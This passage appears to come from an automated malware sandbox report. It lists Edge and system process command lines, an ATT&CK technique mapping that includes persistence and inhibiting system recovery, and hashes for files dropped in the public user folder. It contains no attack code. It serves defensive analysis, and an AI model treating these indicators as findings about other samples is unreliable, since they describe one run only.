        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,8927209235395130208,1711406268026790990,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
        5⤵
        
        PID:760
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,8927209235395130208,1711406268026790990,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4072
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,8927209235395130208,1711406268026790990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
        5⤵
        
        PID:3604
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8927209235395130208,1711406268026790990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
        5⤵
        
        PID:2264
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8927209235395130208,1711406268026790990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:1
        5⤵
        
        PID:748
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2076,8927209235395130208,1711406268026790990,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3196 /prefetch:8
        5⤵
        
        PID:1800
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8927209235395130208,1711406268026790990,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4340 /prefetch:1
        5⤵
        
        PID:4532
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8927209235395130208,1711406268026790990,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1
        5⤵
        
        PID:1056
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2076,8927209235395130208,1711406268026790990,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4504 /prefetch:8
        5⤵
        
        PID:4592
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8927209235395130208,1711406268026790990,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:1
        5⤵
        
        PID:2524
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8927209235395130208,1711406268026790990,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:1
        5⤵
        
        PID:2376
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,8927209235395130208,1711406268026790990,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6312 /prefetch:8
        5⤵
        
        PID:5336
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
        5⤵
        Drops file in Program Files directory
        
        PID:5344
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7b0805460,0x7ff7b0805470,0x7ff7b0805480
        6⤵
        
        PID:5404
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,8927209235395130208,1711406268026790990,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6312 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5640
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8927209235395130208,1711406268026790990,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:1
        5⤵
        
        PID:5760
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8927209235395130208,1711406268026790990,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2584 /prefetch:1
        5⤵
        
        PID:3616
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2076,8927209235395130208,1711406268026790990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3348 /prefetch:8
        5⤵
        
        PID:5408
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2076,8927209235395130208,1711406268026790990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5776 /prefetch:8
        5⤵
        
        PID:5340
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2076,8927209235395130208,1711406268026790990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2472 /prefetch:8
        5⤵
        
        PID:4776
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8927209235395130208,1711406268026790990,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
        5⤵
        
        PID:5876

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:4892

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3808

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\t2o7g3z

Filesize
3KB

MD5
3b2709348d47be54247950b967278fe6

SHA1
c3cdf2ae717e4b484c6ce1e348de2767b3039754

SHA256
f7926f6fcc99e95fdf63ce5c1b88e22ef5771f37f17fca8ceeab5dd3d8018780

SHA512
46563986cfd0bc11b679eb38308edc1a412288ddf697660e2d08b642772a16d08a449bc83455cda51ba148afd513188296b543a7048940fe9134501b2932d73f

Download Submit
C:\Users\Public\t2o7g3z

Filesize
3KB

MD5
3b2709348d47be54247950b967278fe6

SHA1
c3cdf2ae717e4b484c6ce1e348de2767b3039754

SHA256
f7926f6fcc99e95fdf63ce5c1b88e22ef5771f37f17fca8ceeab5dd3d8018780

SHA512
46563986cfd0bc11b679eb38308edc1a412288ddf697660e2d08b642772a16d08a449bc83455cda51ba148afd513188296b543a7048940fe9134501b2932d73f

Download Submit
C:\Users\Public\t2o7g3z

Filesize
3KB

MD5
3b2709348d47be54247950b967278fe6

SHA1
c3cdf2ae717e4b484c6ce1e348de2767b3039754

SHA256
f7926f6fcc99e95fdf63ce5c1b88e22ef5771f37f17fca8ceeab5dd3d8018780

SHA512
46563986cfd0bc11b679eb38308edc1a412288ddf697660e2d08b642772a16d08a449bc83455cda51ba148afd513188296b543a7048940fe9134501b2932d73f

Download Submit
C:\Users\Public\vovcg3567

Filesize
1KB

MD5
aa5892597800fa52ce0be1106d4cac4d

SHA1
fdaa8761529c32b68b5714b31b530c22ddb7b2b2

SHA256
82348f02222a47f5aa173864bdce1ead6ac1319e9cfd43c41bc5981426597693

SHA512
67b4c30e05527d4dc3d72391b4b96d1471d5a54e6f2a60bf034867df6b23df1cce0aecf4b1b92f8203ed8ebdc33036fc25ed2e2529a05dae88e948a3e01c5824

Download Submit
C:\Users\Public\vovcg3567

Filesize
1KB

MD5
aa5892597800fa52ce0be1106d4cac4d

SHA1
fdaa8761529c32b68b5714b31b530c22ddb7b2b2

SHA256
82348f02222a47f5aa173864bdce1ead6ac1319e9cfd43c41bc5981426597693

SHA512
67b4c30e05527d4dc3d72391b4b96d1471d5a54e6f2a60bf034867df6b23df1cce0aecf4b1b92f8203ed8ebdc33036fc25ed2e2529a05dae88e948a3e01c5824

Download Submit
C:\Users\Public\vovcg3567

Filesize
1KB

MD5
aa5892597800fa52ce0be1106d4cac4d

SHA1
fdaa8761529c32b68b5714b31b530c22ddb7b2b2

SHA256
82348f02222a47f5aa173864bdce1ead6ac1319e9cfd43c41bc5981426597693

SHA512
67b4c30e05527d4dc3d72391b4b96d1471d5a54e6f2a60bf034867df6b23df1cce0aecf4b1b92f8203ed8ebdc33036fc25ed2e2529a05dae88e948a3e01c5824

Download Submit
C:\Windows\Installer\MSIE5A2.tmp

Filesize
1.1MB

MD5
13e790d06a0eb1e0135f5d3e2cd0ba02

SHA1
7fba1f17c598679c0676d04db5c891b2f04003a2

SHA256
9f2dbba04b9b3cdb7a90b691d74372f7314421986a33ef0340d7a3451474c0dd

SHA512
212c6abc51cd8ad262f1a88f41e9f961f19affd610c757a0c522a65412fef26d5cb826dc83518cd9aede768270a5901de2bd7e588c7b4ce4980b15b2394cd417

Download Submit
C:\Windows\Installer\MSIE5A2.tmp

Filesize
1.1MB

MD5
13e790d06a0eb1e0135f5d3e2cd0ba02

SHA1
7fba1f17c598679c0676d04db5c891b2f04003a2

SHA256
9f2dbba04b9b3cdb7a90b691d74372f7314421986a33ef0340d7a3451474c0dd

SHA512
212c6abc51cd8ad262f1a88f41e9f961f19affd610c757a0c522a65412fef26d5cb826dc83518cd9aede768270a5901de2bd7e588c7b4ce4980b15b2394cd417

Download Submit
\??\pipe\LOCAL\crashpad_2096_TNFFZLJWLPPWASUI

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/276-197-0x0000000000000000-mapping.dmp

Download
memory/748-158-0x0000000000000000-mapping.dmp

Download
memory/760-150-0x0000000000000000-mapping.dmp

Download
memory/1056-164-0x0000000000000000-mapping.dmp

Download
memory/1424-169-0x0000000000000000-mapping.dmp

Download
memory/1540-167-0x0000000000000000-mapping.dmp

Download
memory/1800-160-0x0000000000000000-mapping.dmp

Download
memory/1808-144-0x0000014B99C80000-0x0000014B99D8F000-memory.dmp

Filesize
1.1MB

Download
memory/1808-133-0x0000000000000000-mapping.dmp

Download
memory/2096-147-0x0000000000000000-mapping.dmp

Download
memory/2264-156-0x0000000000000000-mapping.dmp

Download
memory/2376-182-0x0000000000000000-mapping.dmp

Download
memory/2492-145-0x000002846D080000-0x000002846D083000-memory.dmp

Filesize
12KB

Download
memory/2524-180-0x0000000000000000-mapping.dmp

Download
memory/2704-170-0x0000000000000000-mapping.dmp

Download
memory/3140-148-0x0000000000000000-mapping.dmp

Download
memory/3176-142-0x0000000000000000-mapping.dmp

Download
memory/3484-166-0x0000000000000000-mapping.dmp

Download
memory/3604-154-0x0000000000000000-mapping.dmp

Download
memory/3616-202-0x0000000000000000-mapping.dmp

Download
memory/3716-139-0x0000000000000000-mapping.dmp

Download
memory/3872-199-0x0000000000000000-mapping.dmp

Download
memory/3880-176-0x0000000000000000-mapping.dmp

Download
memory/4000-177-0x0000000000000000-mapping.dmp

Download
memory/4040-183-0x0000000000000000-mapping.dmp

Download
memory/4072-151-0x0000000000000000-mapping.dmp

Download
memory/4176-174-0x0000000000000000-mapping.dmp

Download
memory/4304-136-0x0000000000000000-mapping.dmp

Download
memory/4480-173-0x0000000000000000-mapping.dmp

Download
memory/4532-162-0x0000000000000000-mapping.dmp

Download
memory/4592-172-0x0000000000000000-mapping.dmp

Download
memory/4776-208-0x0000000000000000-mapping.dmp

Download
memory/4964-146-0x0000000000000000-mapping.dmp

Download
memory/4968-178-0x0000000000000000-mapping.dmp

Download
memory/4968-165-0x0000000000000000-mapping.dmp

Download
memory/5016-168-0x0000000000000000-mapping.dmp

Download
memory/5068-132-0x0000000000000000-mapping.dmp

Download
memory/5180-200-0x0000000000000000-mapping.dmp

Download
memory/5204-198-0x0000000000000000-mapping.dmp

Download
memory/5340-206-0x0000000000000000-mapping.dmp

Download
memory/5344-184-0x0000000000000000-mapping.dmp

Download
memory/5404-185-0x0000000000000000-mapping.dmp

Download
memory/5408-204-0x0000000000000000-mapping.dmp

Download
memory/5640-186-0x0000000000000000-mapping.dmp

Download
memory/5760-188-0x0000000000000000-mapping.dmp

Download
memory/5852-190-0x0000000000000000-mapping.dmp

Download
memory/5860-189-0x0000000000000000-mapping.dmp

Download
memory/5876-191-0x0000000000000000-mapping.dmp

Download
memory/5876-210-0x0000000000000000-mapping.dmp

Download
memory/5996-192-0x0000000000000000-mapping.dmp

Download
memory/6008-193-0x0000000000000000-mapping.dmp

Download
memory/6076-194-0x0000000000000000-mapping.dmp

Download
memory/6124-195-0x0000000000000000-mapping.dmp

Download
memory/6136-196-0x0000000000000000-mapping.dmp

Download